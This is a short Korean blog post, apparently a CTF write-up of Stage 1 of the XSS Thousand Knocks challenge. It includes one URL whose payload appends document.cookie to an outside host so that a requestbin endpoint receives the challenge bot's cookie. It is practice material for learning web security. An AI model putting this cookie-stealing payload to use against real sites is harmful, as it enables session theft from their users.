XSS문제를 더 풀고 싶어서 XSS Thousand Knocks 풀게 됨.
우선 Stage1은 튜토리얼이었는데 어떻게 푸는건지 몰라서 시간이 좀 걸림.
위와 같이 써있는데 서버를 활용해서 XSS 공격을 보낸 후에 서버에 오는 플래그를 읽으면 되는 문제라고 한다.
처음에는 vm 서버를 활용해서 문제를 풀려고 했으나 외부 접속을 막고 있는지 문제가 풀리지 않았다.
그래서 http://requestbin.fullcontact.com을 활용하였다.
해당 문제에 1번에 위와 같이 적어있어서 해당 페이지에 접속해
http://8293927d3c84ed42eef26dd9ceaaa3d9bf448dda.knock.xss.moe/?location=%22http://example.com/?%22%2Bdocument.cookie
이렇게 적어줬는데 이렇게 푸는 문제가 아니라 url form에 넣으면 이 사이트에서 알아서 플래그를 보내준다.
이 튜토리얼은 그 과정을 설명하기 위한 문제인듯하다.
requestbin을 활용하면 url이 제공되는데 그 제공된 url의 example.com 안에 넣어서 보내면 플래그가 requestbin으로 전송된다.
튜토리얼을 통해 어떻게 푸는지 알게 되었다.
'WebHacking > XSS Thousand Knocks Write-Up' 카테고리의 다른 글
| XSS Thousand Knocks Stage4 write up (0) | 2018.07.18 |
|---|---|
| XSS Thousand Knocks Stage3 write up (0) | 2018.07.18 |
| XSS Thousand Knocks Stage2 write up (0) | 2018.07.18 |